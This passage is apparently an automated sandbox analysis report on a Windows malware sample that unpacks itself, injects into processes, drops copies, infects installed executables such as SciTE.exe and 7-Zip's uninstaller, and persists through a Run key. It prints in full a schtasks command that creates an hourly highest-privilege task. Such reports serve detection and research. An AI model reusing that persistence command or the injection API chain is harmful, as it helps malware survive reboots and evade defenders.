Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Lisect_AVT_24003_G1A_89.exe

Static file information: File size 3146240 > 1048576

Source: Lisect_AVT_24003_G1A_89.exe

Static PE information: Raw size of .data is bigger than: 0x100000 < 0x22c400

Source:

Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Unpacked PE file: 0.2.Lisect_AVT_24003_G1A_89.exe.fb0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Unpacked PE file: 1.2.jHYZko.exe.e60000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Unpacked PE file: 7.2.MPGPH131.exe.570000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Unpacked PE file: 8.2.MPGPH131.exe.570000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Unpacked PE file: 15.2.RageMP131.exe.8c0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:R;Unknown_Section6:EW;.data:EW;pL~u:EW;
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Unpacked PE file: 16.2.jHYZko.exe.1e0000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Contains functionality to check for running processes (XOR)

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,	0_2_00FBAB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,	7_2_0057AB50
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Code function: CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,	8_2_0057AB50

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Code function: 0_2_00FCA100 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,

0_2_00FCA100

Source: initial sample

Static PE information: section where entry point is pointing to: pL~u

Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name:
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name: pL~u
Source: jHYZko.exe.0.dr	Static PE information: section name: .aspack
Source: jHYZko.exe.0.dr	Static PE information: section name: .adata
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name:
Source: RageMP131.exe.0.dr	Static PE information: section name: pL~u
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name:
Source: MPGPH131.exe.0.dr	Static PE information: section name: pL~u
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_0108D509 push ecx; ret	0_2_0108D51C
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA0EC0 push 7ECA0002h; ret	0_2_7ECA0ECF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA1AC0 push 7ECA0002h; ret	0_2_7ECA1ACF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA26C0 push 7ECA0002h; ret	0_2_7ECA26CF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA16D0 push 7ECA0002h; ret	0_2_7ECA16DF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA22D0 push 7ECA0002h; ret	0_2_7ECA22DF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA12E0 push 7ECA0002h; ret	0_2_7ECA12EF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA1EE0 push 7ECA0002h; ret	0_2_7ECA1EEF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA2AE0 push 7ECA0002h; ret	0_2_7ECA2AEF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA0EF0 push 7ECA0002h; ret	0_2_7ECA0EFF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA1AF0 push 7ECA0002h; ret	0_2_7ECA1AFF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA26F0 push 7ECA0002h; ret	0_2_7ECA26FF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA1280 push 7ECA0002h; ret	0_2_7ECA128F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA1E80 push 7ECA0002h; ret	0_2_7ECA1E8F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA2A80 push 7ECA0002h; ret	0_2_7ECA2A8F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA0E90 push 7ECA0002h; ret	0_2_7ECA0E9F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA1A90 push 7ECA0002h; ret	0_2_7ECA1A9F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA2690 push 7ECA0002h; ret	0_2_7ECA269F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA16A0 push 7ECA0002h; ret	0_2_7ECA16AF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA22A0 push 7ECA0002h; ret	0_2_7ECA22AF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA12B0 push 7ECA0002h; ret	0_2_7ECA12BF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA1EB0 push 7ECA0002h; ret	0_2_7ECA1EBF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA2AB0 push 7ECA0002h; ret	0_2_7ECA2ABF
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA1640 push 7ECA0002h; ret	0_2_7ECA164F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA2240 push 7ECA0002h; ret	0_2_7ECA224F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA1250 push 7ECA0002h; ret	0_2_7ECA125F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA1E50 push 7ECA0002h; ret	0_2_7ECA1E5F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA2A50 push 7ECA0002h; ret	0_2_7ECA2A5F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA0E60 push 7ECA0002h; ret	0_2_7ECA0E6F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA1A60 push 7ECA0002h; ret	0_2_7ECA1A6F
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Code function: 0_2_7ECA2660 push 7ECA0002h; ret	0_2_7ECA266F

Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name: entropy: 7.999515690267131
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name: entropy: 7.995045563532632
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name: entropy: 7.346914669025697
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name: entropy: 7.987242582491748
Source: Lisect_AVT_24003_G1A_89.exe	Static PE information: section name: pL~u entropy: 6.934637589599884
Source: jHYZko.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: RageMP131.exe.0.dr	Static PE information: section name: entropy: 7.999515690267131
Source: RageMP131.exe.0.dr	Static PE information: section name: entropy: 7.995045563532632
Source: RageMP131.exe.0.dr	Static PE information: section name: entropy: 7.346914669025697
Source: RageMP131.exe.0.dr	Static PE information: section name: entropy: 7.987242582491748
Source: RageMP131.exe.0.dr	Static PE information: section name: pL~u entropy: 6.934637589599884
Source: MPGPH131.exe.0.dr	Static PE information: section name: entropy: 7.999515690267131
Source: MPGPH131.exe.0.dr	Static PE information: section name: entropy: 7.995045563532632
Source: MPGPH131.exe.0.dr	Static PE information: section name: entropy: 7.346914669025697
Source: MPGPH131.exe.0.dr	Static PE information: section name: entropy: 7.987242582491748
Source: MPGPH131.exe.0.dr	Static PE information: section name: pL~u entropy: 6.934637589599884
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.93452978692724
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.934615465188442
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.9345550066903225

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	File created: C:\Users\user\AppData\Local\Temp\jHYZko.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	File created: C:\ProgramData\MPGPH131\MPGPH131.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe	File created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

File created: C:\ProgramData\MPGPH131\MPGPH131.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131			Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131			Jump to behavior

Hooking and other Techniques for Hiding and Protection

